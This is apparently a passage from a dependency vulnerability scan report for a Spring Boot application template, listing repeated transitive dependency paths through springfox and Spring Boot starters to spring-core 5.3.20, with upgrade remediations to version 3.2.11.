  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-actuator@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
